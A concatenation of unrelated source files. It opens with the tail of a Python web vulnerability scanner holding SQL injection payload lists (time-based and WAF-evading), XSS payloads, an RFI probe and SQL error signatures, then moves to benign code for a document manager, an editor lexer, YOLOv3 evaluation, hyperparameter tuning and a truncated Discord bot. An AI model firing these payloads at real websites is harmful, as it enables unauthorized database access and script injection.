" Union All Select 1,2,3,4",
" Union All Select 1,2,3,4,5-- ",
" Union All Select @@version,sleep(5),user(),benchmark(1000000,md5('A')),5",
" Union All Select @@version,user(),sleep(5),benchmark(1000000,md5('A')),null,null,null-- ",
" And 5650=CONVERT(int,(Union all selectchar(88)+char(88)+char(88)))-- ",
" Union All Select 'inj'||'ect'||'xxx',2,3,4,5--",
" Rlike (Select (case when (4346=4346) then 0x61646d696e else 0x28 end)) and 'Txws'='",
" And%200;--",
" Union%20All%20Select%201,2,3,4",
" Union%20All%20Select%201,2,3,4,5--",
" Union%20All%20Select%20@@version,sleep(5),user(),benchmark(1000000,md5(%27A%27)),5",
" Union%20All%20Select%20@@version,user(),sleep(5),benchmark(1000000,md5(%27A%27)),null,null,null--",
" And%205650=CONVERT(int,(Union%20all%20selectchar(88)+char(88)+char(88)))--",
" Union%20All%20Select%20%27inj%27||%27ect%27||%27xxx%27,2,3,4,5--",
" Rlike%20(Select%20(case%20when%20(4346=4346)%20then%200x61646d696e%20else%200x28%20end))%20and%20%27Txws%27=%27",
" chr(97)+chr(110)+chr(100) 0;-- ",
" aandNandd 0;-- ",
]
for i in quotes:
for j in range(10):
if waf.cget("text") == 'WAF:None':
p0 = i + payload_0[random.randint(0,85)]
p1 = i + payload_1[random.randint(0,85)]
else:
p0 = i + payload_3[random.randint(0,85)]
p1 = i + payload_4[random.randint(0,85)]
try:
res_md5_1 = md5_encrypt(requests.get(url=self.url, headers=HEADER).text)
res_md5_2 = md5_encrypt(requests.get(url=self.url + urlencode(p0), headers=HEADER).text)
res_md5_3 = md5_encrypt(requests.get(url=self.url + urlencode(p1), headers=HEADER).text)
res_DOM_1 = DOM.check(self.url)
res_DOM_2 = DOM.check(self.url + urlencode(p0))
res_DOM_3 = DOM.check(self.url + urlencode(p1))
except Exception as e:
print(e)
res_md5_1 = res_md5_2 = res_md5_3 = 0
pass
if (res_DOM_1 == res_DOM_3 and res_DOM_1 != res_DOM_2) or ((res_md5_1 == res_md5_3) and res_md5_1 != res_md5_2):
return p0 + "~" + self.url
return 0
def Sql_error_scan(self):
'''
This method searches for SQL errors in html's.
@parameter response: The HTTP response object
@return: A list of errors found on the page
'''
r1 = requests.get(url=self.url, headers=HEADER)
r2 = requests.get(url=self.url + urlencode('\''), headers=HEADER)
res = []
for sql_regex, dbms_type in self.Get_sql_errors():
match1 = sql_regex.search(r1.text)
match2 = sql_regex.search(r2.text)
if match2 and not match1:
msg = 'A SQL error was found in the response supplied by the web application,'
msg += match2.group(0) + '". The error was found '
# res.append( (sql_regex, match.group(0), dbms_type) )
return self.url
return 0
def Xss_scan(self):
XSS_PAYLOAD = [
'<script>alert(1);</script>',
'<script>prompt(1);</script>',
'<script>confirm(1);</script>',
'<scr<script>ipt>alert(1)</scr<script>ipt>',
'<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4=">',
'<svg/onload=prompt(1);>',
'<marquee/onstart=confirm(1)>/',
'<body onload=prompt(1);>',
'<select autofocus onfocus=alert(1)>',
'<textarea autofocus onfocus=alert(1)>',
'<keygen autofocus onfocus=alert(1)>',
'<video><source onerror="javascript:alert(1)">'
]
for test in XSS_PAYLOAD:
r = requests.get(url=self.url + urlencode(test), headers=HEADER)
# if ( 'alert(1)' or 'prompt(1)' or 'confirm(1)' ) in r.text:
if test in r.text:
return 1
return 0
def FileInclude_scan(self):
RFI_PAYLOAD = [
"http://www.baidu.com"
]
url = urllib.parse.urlparse(self.url)
url_query = url.query
url_query_tmp = []
if not url_query:
return 0
for i in url_query.split('&'):
i_tmp = i.replace(i.split('=')[1], RFI_PAYLOAD[0])
url_query_tmp = url_query
url_query_tmp = url_query_tmp.replace(i, i_tmp)
url_tmp = urllib.parse.urlunparse(
urllib.parse.ParseResult(url.scheme, url.netloc, url.path, url.params, url_query_tmp, url.fragment))
r = requests.get(url=url_tmp, headers=HEADER)
if "tieba.baidu.com" in r.text:
return 1
return 0
def Get_sql_errors(self):
if len(self.sql_errors) != 0:
return self.sql_errors
else:
errors = []
# ASP / MSSQL
errors.append(('System\.Data\.OleDb\.OleDbException', dbms.MSSQL))
errors.append(('\\[SQL Server\\]', dbms.MSSQL))
errors.append(('\\[Microsoft\\]\\[ODBC SQL Server Driver\\]', dbms.MSSQL))
errors.append(('\\[SQLServer JDBC Driver\\]', dbms.MSSQL))
errors.append(('\\[SqlException', dbms.MSSQL))
errors.append(('System.Data.SqlClient.SqlException', dbms.MSSQL))
errors.append(('Unclosed quotation mark after the character string', dbms.MSSQL))
errors.append(("'80040e14'", dbms.MSSQL))
errors.append(('mssql_query\\(\\)', dbms.MSSQL))
errors.append(('odbc_exec\\(\\)', dbms.MSSQL))
errors.append(('Microsoft OLE DB Provider for ODBC Drivers', dbms.MSSQL))
errors.append(('Microsoft OLE DB Provider for SQL Server', dbms.MSSQL))
errors.append(('Incorrect syntax near', dbms.MSSQL))
errors.append(('Sintaxis incorrecta cerca de', dbms.MSSQL))
errors.append(('Syntax error in string in query expression', dbms.MSSQL))
errors.append(('ADODB\\.Field \\(0x800A0BCD\\)<br>', dbms.MSSQL))
errors.append(("Procedure '[^']+' requires parameter '[^']+'", dbms.MSSQL))
errors.append(("ADODB\\.Recordset'", dbms.MSSQL))
errors.append(("Unclosed quotation mark before the character string", dbms.MSSQL))
# DB2
errors.append(('SQLCODE', dbms.DB2))
errors.append(('DB2 SQL error:', dbms.DB2))
errors.append(('SQLSTATE', dbms.DB2))
errors.append(('\\[IBM\\]\\[CLI Driver\\]\\[DB2/6000\\]', dbms.DB2))
errors.append(('\\[CLI Driver\\]', dbms.DB2))
errors.append(('\\[DB2/6000\\]', dbms.DB2))
# Sybase
errors.append(("Sybase message:", dbms.SYBASE))
# Access
errors.append(('Syntax error in query expression', dbms.ACCESS))
errors.append(('Data type mismatch in criteria expression.', dbms.ACCESS))
errors.append(('Microsoft JET Database Engine', dbms.ACCESS))
errors.append(('\\[Microsoft\\]\\[ODBC Microsoft Access Driver\\]', dbms.ACCESS))
# ORACLE
errors.append(('(PLS|ORA)-[0-9][0-9][0-9][0-9]', dbms.ORACLE))
# POSTGRE
errors.append(('PostgreSQL query failed:', dbms.POSTGRE))
errors.append(('supplied argument is not a valid PostgreSQL result', dbms.POSTGRE))
errors.append(('pg_query\\(\\) \\[:', dbms.POSTGRE))
errors.append(('pg_exec\\(\\) \\[:', dbms.POSTGRE))
# MYSQL
errors.append(('supplied argument is not a valid MySQL', dbms.MYSQL))
errors.append(('Column count doesn\'t match value count at row', dbms.MYSQL))
errors.append(('mysql_fetch_array\\(\\)', dbms.MYSQL))
errors.append(('mysql_', dbms.MYSQL))
errors.append(('on MySQL result index', dbms.MYSQL))
errors.append(('You have an error in your SQL syntax;', dbms.MYSQL))
errors.append(('You have an error in your SQL syntax near', dbms.MYSQL))
errors.append(('MySQL server version for the right syntax to use', dbms.MYSQL))
errors.append(('\\[MySQL\\]\\[ODBC', dbms.MYSQL))
errors.append(("Column count doesn't match", dbms.MYSQL))
errors.append(("the used select statements have different number of columns", dbms.MYSQL))
errors.append(("Table '[^']+' doesn't exist", dbms.MYSQL))
# Informix
errors.append(('com\\.informix\\.jdbc', dbms.INFORMIX))
errors.append(('Dynamic Page Generation Error:', dbms.INFORMIX))
errors.append(('An illegal character has been found in the statement', dbms.INFORMIX))
errors.append(('<b>Warning</b>: ibase_', dbms.INTERBASE))
errors.append(('Dynamic SQL Error', dbms.INTERBASE))
# DML
errors.append(('\\[DM_QUERY_E_SYNTAX\\]', dbms.DMLDATABASE))
errors.append(('has occurred in the vicinity of:', dbms.DMLDATABASE))
errors.append(('A Parser Error \\(syntax error\\)', dbms.DMLDATABASE))
# Java
errors.append(('java\\.sql\\.SQLException', dbms.JAVA))
errors.append(('Unexpected end of command in statement', dbms.JAVA))
# Coldfusion
errors.append(('\\[Macromedia\\]\\[SQLServer JDBC Driver\\]', dbms.MSSQL))
# Generic errors..
errors.append(('SELECT .*? FROM .*?', dbms.UNKNOWN))
errors.append(('UPDATE .*? SET .*?', dbms.UNKNOWN))
errors.append(('INSERT INTO .*?', dbms.UNKNOWN))
errors.append(('Unknown column', dbms.UNKNOWN))
errors.append(('where clause', dbms.UNKNOWN))
errors.append(('SqlServer', dbms.UNKNOWN))
# compile them and save that into self.sql_errors.
for re_string, dbms_type in errors:
self.sql_errors.append((re.compile(re_string, re.IGNORECASE), dbms_type))
return self.sql_errors
def check(self, module, output, waf):
global vul_file
url_struct = urllib.parse.urlparse(self.url)
if url_struct.query != '':
if module == 'all':
self.run()
if module == 'sql':
i = self.Integer_sqlinj_scan()
j = self.Str_sqlinj_scan(waf)
k = self.Sql_error_scan()
if i:
output.insert("", "end", values=(i, " +1", "yes", "High",self.url[self.url.find("?")+1:self.url.find("=")]))
mysql.insert(i+"","+1","yes","High",self.url[self.url.find("?")+1:self.url.find("=")])
print(get_ctime() + '\t' + self.url + ":SQL injection!")
elif j:
output.insert("", "end", values=(j.split("~")[1], j.split("~")[0], "yes", "High",self.url[self.url.find("?")+1:self.url.find("=")]))
mysql.insert(j.split("~")[1] , j.split("~")[0], "yes", "High", self.url[self.url.find("?") + 1:self.url.find("=")])
print(get_ctime() + '\t' + self.url + ":SQL injection!")
elif k:
output.insert("", "end", values=(k, "\'", "yes", "High",self.url[self.url.find("?")+1:self.url.find("=")]))
mysql.insert(k+"","\'", "yes", "High",self.url[self.url.find("?") + 1:self.url.find("=")])
print(get_ctime() + '\t' + self.url + ":SQL injection!")
else:
output.insert("", "end", values=(self.url, "", "no", "",self.url[self.url.find("?")+1:self.url.find("=")]))
mysql.insert(self.url, "\'", "no", "", self.url[self.url.find("?") + 1:self.url.find("=")])
# print get_ctime() + '\t' + self.url + ":SQL injection!"+ self.Str_sqlinj_scan()
# self.logfile.write(get_ctime() + '\t' + self.url + ":SQL injection!" + '\n')
# self.logfile.flush()
# vul_file.write(self.url + '\t' + "SQL injection!" + '\n')
# vul_file.flush()
if module == 'xss':
if self.Xss_scan():
print(get_ctime() + '\t' + self.url + ":XSS!")
self.logfile.write(get_ctime() + '\t' + self.url + ":XSS!" + '\n')
self.logfile.flush()
vul_file.write(self.url + '\t' + "XSS!" + '\n')
vul_file.flush()
if module == 'rfi':
if self.FileInclude_scan():
print(get_ctime() + '\t' + self.url + ":RFI!")
self.logfile.write(get_ctime() + '\t' + self.url + ":RFI!" + '\n')
self.logfile.flush()
vul_file.write(self.url + '\t' + "RFI!" + '\n')
vul_file.flush()
def run(self):
print("[+] %s\t%s" % (get_ctime(), self.url))
if self.Integer_sqlinj_scan():
print(" Integer SQL injection!")
self.logfile.write(get_ctime() + '\t' + self.url + ":Integer SQL injection!" + '\n')
self.logfile.flush()
vul_file.write(self.url + '\t' + "Integer SQL injection!" + '\n')
vul_file.flush()
elif self.Str_sqlinj_scan():
print(" String SQL injection!")
self.logfile.write(get_ctime() + '\t' + self.url + ":String SQL injection!" + '\n')
self.logfile.flush()
vul_file.write(self.url + '\t' + "String SQL injection!" + '\n')
vul_file.flush()
elif self.Sql_error_scan():
print(" SQL error injection!")
self.logfile.write(get_ctime() + '\t' + self.url + ":SQL error injection!" + '\n')
self.logfile.flush()
vul_file.write(self.url + '\t' + "SQL error injection!" + '\n')
vul_file.flush()
elif self.Xss_scan():
print(" XSS vulnerabe!")
self.logfile.write(get_ctime() + '\t' + self.url + ":XSS vulnerabe!" + '\n')
self.logfile.flush()
vul_file.write(self.url + '\t' + "XSS vulnerabe!" + '\n')
vul_file.flush()
elif self.FileInclude_scan():
print(" RFI vulnerabe!")
self.logfile.write(get_ctime() + '\t' + self.url + ":RFI vulnerabe!" + '\n')
self.logfile.flush()
vul_file.write(self.url + '\t' + "RFI vulnerabe!" + '\n')
vul_file.flush()
else:
print(" safe")
self.logfile.write(get_ctime() + '\t' + self.url + ":safe" + '\n')
self.logfile.flush()
if __name__ == '__main__':
logfile = open('logfile.txt', 'a')
url = "http://192.168.127.12:8098/stkj/index.php/product/safety_wire?t=7"
self = vul_module(url, logfile)
self.start()
'''
url = "http://1172.16.17.32/sqli/example1.php?name=root"
self = vul_module(url,logfile)
self.start()
url = "http://192.168.8.131/sqli/example2.php?name=root"
self = vul_module(url,logfile)
self.start()
url = "http://192.168.8.131/sqli/example3.php?name=root"
self = vul_module(url,logfile)
self.start()
url = "http://19172.16.17.32/sqli/example4.php?id=2"
self = vul_module(url,logfile)
self.start()
url = "http://192.168.8.131/sqli/example5.php?id=2"
self = vul_module(url,logfile)
self.start()
url = "http://192.168.8.131/sqli/example6.php?id=2"
self = vul_module(url,logfile)
self.start()
url = "http://192.168.8.131/sqli/example7.php?id=2"
self = vul_module(url,logfile)
self.start()
url = "http://192.168.8.131/sqli/example8.php?order=name"
self = vul_module(url,logfile)
self.start()
url = "http://192.168.8.131/sqli/example9.php?order=name"
self = vul_module(url,logfile)
self.start()
'''
| 2.65625 | 3 |
mayan/apps/common/queues.py | CMU-313/fall-2021-hw2-451-unavailable-for-legal-reasons | 2 | 12769725 | from django.utils.translation import ugettext_lazy as _
from mayan.apps.task_manager.classes import CeleryQueue
from mayan.apps.task_manager.workers import worker_d
queue_tools = CeleryQueue(label=_('Tools'), name='tools', worker=worker_d)
| 1.554688 | 2 |
eye/lexers.py | hydrargyrum/eye | 12 | 12769726 | # this project is licensed under the WTFPLv2, see COPYING.txt for details
"""Helpers for lexer use
In EYE, builtin lexers from QScintilla are used. See :any:`PyQt5.Qsci.QsciLexer`.
"""
import mimetypes
from PyQt5.QtGui import QColor, QFont
from PyQt5.Qsci import (
QsciLexerBash, QsciLexerBatch, QsciLexerCPP, QsciLexerCSharp, QsciLexerJava, QsciLexerJavaScript,
QsciLexerCSS, QsciLexerD, QsciLexerFortran, QsciLexerHTML, QsciLexerXML, QsciLexerLua,
QsciLexerMakefile, QsciLexerPascal, QsciLexerPerl, QsciLexerPO, QsciLexerPostScript,
QsciLexerPOV, QsciLexerProperties, QsciLexerPython, QsciLexerRuby, QsciLexerSQL, QsciLexerTCL,
QsciLexerTeX, QsciLexerYAML, QsciLexerDiff,
)
__all__ = ('extensionToLexer', 'mimeToLexer', 'applyStyles', 'stylesFromLexer')
def stylesFromLexer(lexer):
"""Return the style names used by a QsciLexer object
Lexers provide a number of styles names, like "Comment", "Operator", "Identifier", etc.
"""
styles = {}
for i in range(1 << lexer.styleBitsNeeded()):
name = lexer.description(i)
if not name:
break
styles[name] = i
return styles
def applyStyles(lexer, spec):
styles = stylesFromLexer(lexer)
for name, values in spec:
style = styles.get(name, -1)
if style >= 0:
lexer.setColor(QColor(values[0]))
if len(values) > 1:
lexer.setPaper(QColor(values[1]))
if len(values) > 2:
lexer.setFont(QFont(values[2]))
_extensionLexer = {
'sh': QsciLexerBash,
'bash': QsciLexerBash,
'zsh': QsciLexerBash,
'bat': QsciLexerBatch,
'cmd': QsciLexerBatch,
'c': QsciLexerCPP,
'cc': QsciLexerCPP,
'cpp': QsciLexerCPP,
'cxx': QsciLexerCPP,
'h': QsciLexerCPP,
'hh': QsciLexerCPP,
'hpp': QsciLexerCPP,
'hxx': QsciLexerCPP,
'cs': QsciLexerCSharp,
'java': QsciLexerJava,
'js': QsciLexerJavaScript,
'json': QsciLexerJavaScript,
'css': QsciLexerCSS,
'd': QsciLexerD,
'patch': QsciLexerDiff,
'f': QsciLexerFortran,
'html': QsciLexerHTML,
'htm': QsciLexerHTML,
'xml': QsciLexerXML,
'lua': QsciLexerLua,
'Makefile': QsciLexerMakefile,
'pas': QsciLexerPascal,
'pl': QsciLexerPerl,
'pm': QsciLexerPerl,
'po': QsciLexerPO,
'pot': QsciLexerPO,
'ps': QsciLexerPostScript,
'pov': QsciLexerPOV,
'inc': QsciLexerPOV,
'properties': QsciLexerProperties,
'ini': QsciLexerProperties,
'py': QsciLexerPython,
'rb': QsciLexerRuby,
'sql': QsciLexerSQL,
'tcl': QsciLexerTCL,
'tex': QsciLexerTeX,
'yaml': QsciLexerYAML,
'yml': QsciLexerYAML,
}
def extensionToLexer(ext):
"""Return a QsciLexer corresponding to extension
If no appropriate lexer is found for `ext`, `None` is returned.
"""
if ext and ext.startswith('.'):
ext = ext[1:]
return _extensionLexer.get(ext)
def mimeToLexer(mime):
"""Return a QsciLexer corresponding to mimetype
If no appropriate lexer is found for `mime`, `None` is returned.
"""
return extensionToLexer(mimetypes.guess_extension(mime))
| 1.875 | 2 |
applications/tensorflow/detection/yolov3/evaluate.py | payoto/graphcore_examples | 260 | 12769727 | #! /usr/bin/env python
# coding=utf-8
# Copyright (c) 2021 Graphcore Ltd. All Rights Reserved.
# Copyright (c) 2019 YunYang1994 <<EMAIL>>
# License: MIT (https://opensource.org/licenses/MIT)
# This file has been modified by Graphcore Ltd.
import argparse
import json
import math
import os
import shutil
import time
import numpy as np
import core.utils as utils
import cv2
import log
import tensorflow as tf
from core.dataset import Dataset
from core.yolov3 import YOLOV3
from ipu_utils import stages_constructor
from log import logger
from tensorflow.python import ipu
from tensorflow.python.ipu import ipu_infeed_queue, ipu_outfeed_queue, loops
class YoloTest(object):
def __init__(self, opts):
self.input_size = opts["test"]["input_size"]
self.classes = utils.read_class_names(opts["yolo"]["classes"])
self.num_classes = len(self.classes)
self.score_threshold = opts["test"]["score_threshold"]
self.iou_threshold = opts["test"]["iou_threshold"]
self.moving_avg_decay = opts["yolo"]["moving_avg_decay"]
self.annotation_path = opts["test"]["annot_path"]
self.weight_file = opts["test"]["weight_file"]
self.write_image = opts["test"]["write_image"]
self.write_image_path = opts["test"]["write_image_path"]
self.show_label = opts["test"]["show_label"]
self.batch_size = opts["test"]["batch_size"]
self.precision = tf.float16 if opts["yolo"]["precision"] == "fp16" else tf.float32
self.use_moving_avg = opts["yolo"]["use_moving_avg"]
self.repeat_count = opts["test"]["repeat_count"]
self.use_infeed_queue = opts["test"]["use_infeed_queue"]
self.predicted_file_path = opts["test"]["predicted_file_path"]
self.ground_truth_file_path = opts["test"]["ground_truth_file_path"]
self.meta_dict = {}
self.testset = Dataset("test", opts)
# Configure arguments for targeting the IPU
config = ipu.config.IPUConfig()
config.auto_select_ipus = 1
config.configure_ipu_system()
model = YOLOV3(False, opts)
# construct model
# we will put whole network on one ipu
layers = []
# build layer functions for backbone and upsample
layers.extend(model.build_backbone())
# last layer of darknet53 is classification layer, so it have 52 conv layers
assert len(layers) == 52
layers.extend(model.build_upsample())
# there is 25 conv layers if we count upsmaple as a conv layer
assert len(layers) == 52+25
# decoding layer and loss layer is always put on last IPU
layers.append(model.decode_boxes)
# reuse stages_constructor so we don't need to pass params by hand
network_func = stages_constructor(
[layers],
["input_data", "nums"],
["pred_sbbox", "pred_mbbox", "pred_lbbox", "nums"])[0]
input_shape = (self.batch_size, self.input_size, self.input_size, 3)
self.lines, self.image_dict = self.load_data()
if self.use_infeed_queue:
# The dataset for feeding the graphs
def data_gen():
return self.data_generator()
with tf.device("cpu"):
ds = tf.data.Dataset.from_generator(data_gen,
output_types=(tf.float16, tf.int32),
output_shapes=(input_shape, (self.batch_size,))
)
ds = ds.repeat()
ds = ds.prefetch(self.repeat_count*10)
# The host side queues
infeed_queue = ipu_infeed_queue.IPUInfeedQueue(ds)
outfeed_queue = ipu_outfeed_queue.IPUOutfeedQueue()
def model_func(input_data, nums):
pred_sbbox, pred_mbbox, pred_lbbox, nums = network_func(input_data, nums)
outfeed = outfeed_queue.enqueue(
{"pred_sbbox": pred_sbbox, "pred_mbbox": pred_mbbox, "pred_lbbox": pred_lbbox, "nums": nums})
return outfeed
def my_net():
r = loops.repeat(self.repeat_count,
model_func, [], infeed_queue)
return r
with ipu.scopes.ipu_scope("/device:IPU:0"):
self.run_loop = ipu.ipu_compiler.compile(
my_net, inputs=[])
# The outfeed dequeue has to happen after the outfeed enqueue
self.dequeue_outfeed = outfeed_queue.dequeue()
self.sess = tf.Session(config=tf.ConfigProto())
self.sess.run(infeed_queue.initializer)
else:
# if using feed dict, it will be simpler
# the cost is throughput
with tf.device("cpu"):
with tf.name_scope("input"):
# three channel images
self.input_data = tf.placeholder(
shape=input_shape, dtype=self.precision, name="input_data")
self.nums = tf.placeholder(
shape=(self.batch_size), dtype=tf.int32, name="nums")
with ipu.scopes.ipu_scope("/device:IPU:0"):
self.output = ipu.ipu_compiler.compile(
network_func, [self.input_data, self.nums])
self.sess = tf.Session(
config=tf.ConfigProto())
if self.use_moving_avg:
with tf.name_scope("ema"):
ema_obj = tf.train.ExponentialMovingAverage(
self.moving_avg_decay)
self.saver = tf.train.Saver(ema_obj.variables_to_restore())
else:
self.saver = tf.train.Saver()
self.saver.restore(self.sess, self.weight_file)
def load_data(self):
with open(self.annotation_path, "r") as annotation_file:
# load_all images
lines = []
for line in annotation_file:
lines.append(line)
image_dict = self.testset.load_images(dump=False)
return lines, image_dict
def data_generator(self):
"""Generate input image and write groundtruth info
"""
if os.path.exists(self.write_image_path):
shutil.rmtree(self.write_image_path)
os.mkdir(self.write_image_path)
self.ground_truth_file = open(self.ground_truth_file_path, "w")
image_datas = []
nums = []
for num, line in enumerate(self.lines):
annotation = line.strip().split()
image_path = annotation[0]
image_name = image_path.split("/")[-1]
image = self.image_dict[line.strip()]
bbox_data_gt = np.array(
[list(map(int, box.split(","))) for box in annotation[1:]])
if len(bbox_data_gt) == 0:
bboxes_gt = []
classes_gt = []
else:
bboxes_gt, classes_gt = bbox_data_gt[:,
:4], bbox_data_gt[:, 4]
num_bbox_gt = len(bboxes_gt)
# output ground-truth
self.ground_truth_file.write(str(num)+":\n")
for i in range(num_bbox_gt):
class_name = self.classes[classes_gt[i]]
xmin, ymin, xmax, ymax = list(map(str, bboxes_gt[i]))
bbox_mess = ",".join(
[class_name, xmin, ymin, xmax, ymax]) + "\n"
self.ground_truth_file.write(bbox_mess)
image_copy = np.copy(image)
org_h, org_w, _ = image.shape
image_data = utils.resize_image(
image_copy, [self.input_size, self.input_size])
# we don't want to pass metadata through pipeline
# so we'll keep it with a dictionary
self.meta_dict[num] = [org_h, org_w, image_name, line]
image_datas.append(image_data)
nums.append(num)
if len(nums) < self.batch_size:
if num < len(self.lines) - 1:
continue
else:
# if there's not enough data to fill the last batch
# we repeat the last image to yield a full sized batch
for _ in range(len(image_datas), self.batch_size):
image_datas.append(image_datas[-1])
nums.append(nums[-1])
image_datas = np.array(image_datas).astype(np.float16)
yield (image_datas, nums)
if num < len(self.lines) - 1:
image_datas = []
nums = []
while True:
# if using infeed_queue. it will need more batches
# to padd the data and meet the required repeat_count
# so we will use last batch for padding
yield (image_datas, nums)
def parse_result(self, pred_sbbox_list, pred_mbbox_list, pred_lbbox_list, nums):
"""Parse and write predicted result
"""
for i in range(len(nums)):
# if nums value is repeated
# that means nums[i] is a repeated value for matching required batch size
# so we can stop the iteration
if i > 0 and nums[i] <= nums[i-1]:
break
num = nums[i]
pred_sbbox = pred_sbbox_list[i]
pred_mbbox = pred_mbbox_list[i]
pred_lbbox = pred_lbbox_list[i]
org_h, org_w, image_name, line = self.meta_dict[num]
image_path = line.strip().split()[0]
image = self.image_dict[line.strip()]
pred_bbox = np.concatenate([np.reshape(pred_sbbox, (-1, 5 + self.num_classes)),
np.reshape(
pred_mbbox, (-1, 5 + self.num_classes)),
np.reshape(pred_lbbox, (-1, 5 + self.num_classes))], axis=0)
# convert boxes from input_image coordinate to original image coordinate
bboxes = utils.postprocess_boxes(
pred_bbox, (org_h, org_w), self.input_size, self.score_threshold)
bboxes_pr = utils.nms(bboxes, self.iou_threshold)
if self.write_image:
image = utils.draw_bbox(
image, bboxes_pr, self.classes, show_label=self.show_label)
cv2.imwrite(self.write_image_path+image_name, image)
self.predict_result_file.write(str(num)+":\n")
for bbox in bboxes_pr:
coor = np.array(bbox[:4], dtype=np.int32)
score = bbox[4]
class_ind = int(bbox[5])
class_name = self.classes[class_ind]
score = "%.4f" % score
xmin, ymin, xmax, ymax = list(map(str, coor))
bbox_mess = ",".join(
[class_name, score, xmin, ymin, xmax, ymax]) + "\n"
self.predict_result_file.write(bbox_mess)
def evaluate(self):
self.predict_result_file = open(self.predicted_file_path, "w")
if self.use_infeed_queue:
# using infeed queue to improve throughput
# we can use an additional thread to run dequeue_outfeed for decrease latency and further improve throughput
total_samples = len(self.lines)
interaction_samples = self.batch_size*self.repeat_count
total_interactions = total_samples/interaction_samples
total_interactions = math.ceil(total_interactions)
for interaction_index in range(total_interactions):
run_start = time.time()
self.sess.run(self.run_loop)
result = self.sess.run(
self.dequeue_outfeed)
run_duration = time.time()-run_start
pred_sbbox_list, pred_mbbox_list, pred_lbbox_list, nums = result[
"pred_sbbox"], result["pred_mbbox"], result["pred_lbbox"], result["nums"]
for i in range(len(nums)):
# len(nums) == repeat_count
# there's repeat count number of batches for each run
if i > 0 and nums[i][0] <= nums[i-1][0]:
# ignore repeated data
# these are only for meeting data size required when using ipu.loops.repeat
break
self.parse_result(pred_sbbox_list[i], pred_mbbox_list[i], pred_lbbox_list[i], nums[i])
logger.info("progress:{}/{} ,latency: {}, through put: {}, batch size: {}, repeat count: {}".format(
(interaction_index+1)*interaction_samples, len(self.lines),
run_duration,
interaction_samples/run_duration,
self.batch_size,
self.repeat_count))
else:
# if not use infeed_queue, it will return for every batch
data_gen = self.data_generator()
interaction_samples = self.batch_size
total_interactions = math.ceil(len(self.lines)/interaction_samples)
for interaction_index in range(total_interactions):
image_datas, nums = next(data_gen)
run_start = time.time()
pred_sbbox_list, pred_mbbox_list, pred_lbbox_list, nums = self.sess.run(
self.output,
feed_dict={
self.input_data: image_datas,
self.nums: nums
}
)
run_duration = time.time()-run_start
self.parse_result(pred_sbbox_list, pred_mbbox_list, pred_lbbox_list, nums)
logger.info("progress:{}/{} ,latency: {}, through put: {}, batch size: {}".format(
(interaction_index+1)*interaction_samples,
len(self.lines),
run_duration,
interaction_samples/run_duration,
self.batch_size))
self.ground_truth_file.close()
self.predict_result_file.close()
self.sess.close()
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="evaluation in TensorFlow", add_help=False)
parser.add_argument("--config", type=str, default="config/config_800.json",
help="json config file for yolov3.")
parser.add_argument("--test_path", type=str, default="./data/dataset/voc_test.txt",
help="data path for test")
arguments = parser.parse_args()
with open(arguments.config) as f:
opts = json.load(f)
opts['test']['annot_path'] = arguments.test_path
YoloTest(opts).evaluate()
| 1.851563 | 2 |
scripts/train.py | MathieuTuli/autoHyper | 9 | 12769728 | """
MIT License
Copyright (c) 2020
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from pathlib import Path
from typing import Dict
from autohyper import optimize, LowRankMetrics, HyperParameters
from torchvision import datasets, transforms
from torch.optim import Adam
from gutils import init_logger
import torchvision.models as models
import numpy as np
import torch
def main():
# indicate which hyper-parameters to optimize
dataset = torch.utils.data.DataLoader(
datasets.CIFAR10('.', download=True, transform=transforms.ToTensor()),
batch_size=128)
def epoch_trainer(hyper_parameters: Dict[str, float],
epochs) -> LowRankMetrics:
# update model/optimizer parameters based on values in @argument:
# hyper_parameters
print('Run epochs:', hyper_parameters)
model = models.resnet18()
model.train()
model = model.cuda()
metrics = LowRankMetrics(list(model.parameters()))
optimizer = Adam(model.parameters(),
lr=hyper_parameters['lr'],
weight_decay=hyper_parameters['weight_decay'],)
criterion = torch.nn.CrossEntropyLoss().cuda()
accs = list()
for epoch in epochs:
for inputs, targets in dataset:
inputs = inputs.cuda()
targets = targets.cuda()
optimizer.zero_grad()
outputs = model(inputs)
loss = criterion(outputs, targets)
loss.backward()
optimizer.step()
accs.append(accuracy(outputs, targets)[0].item())
# run epoch training...
# at every epoch, evaluate low_rank metrics
print(f"Epoch {epoch} | Loss {np.mean(accs)}")
metrics.evaluate()
return metrics
hyper_parameters = HyperParameters(lr=True, weight_decay=True)
final_hp = optimize(epoch_trainer=epoch_trainer,
hyper_parameters=hyper_parameters)
final_hyper_parameters_dict = final_hp.final()
# do your final training will optimized hyper parameters
epoch_trainer(final_hyper_parameters_dict, epochs=range(250))
def accuracy(outputs, targets, topk=(1,)):
with torch.no_grad():
maxk = max(topk)
batch_size = targets.size(0)
_, pred = outputs.topk(maxk, 1, True, True)
pred = pred.t()
correct = pred.eq(targets.contiguous().view(1, -1).expand_as(pred))
res = []
for k in topk:
correct_k = correct[:k].contiguous(
).view(-1).float().sum(0, keepdim=True)
res.append(correct_k.mul_(100.0 / batch_size))
return res
if __name__ == "__main__":
logger = init_logger(Path('logs'))
main()
| 1.882813 | 2 |
cogs/game.py | DoggieLicc/InfoBot | 1 | 12769729 | from discord.ext import commands
from discord.ext.commands.cooldowns import BucketType
from mojang import MojangAPI as Mojang
from pyosu import OsuApi
import discord
import pyosu
from custom_funcs import embed_create, is_uuid4
def sync_minecraft(ctx, account):
try:
if is_uuid4(account):
uuid = account
else:
uuid = Mojang.get_uuid(account)
profile = Mojang.get_profile(uuid)
if not profile:
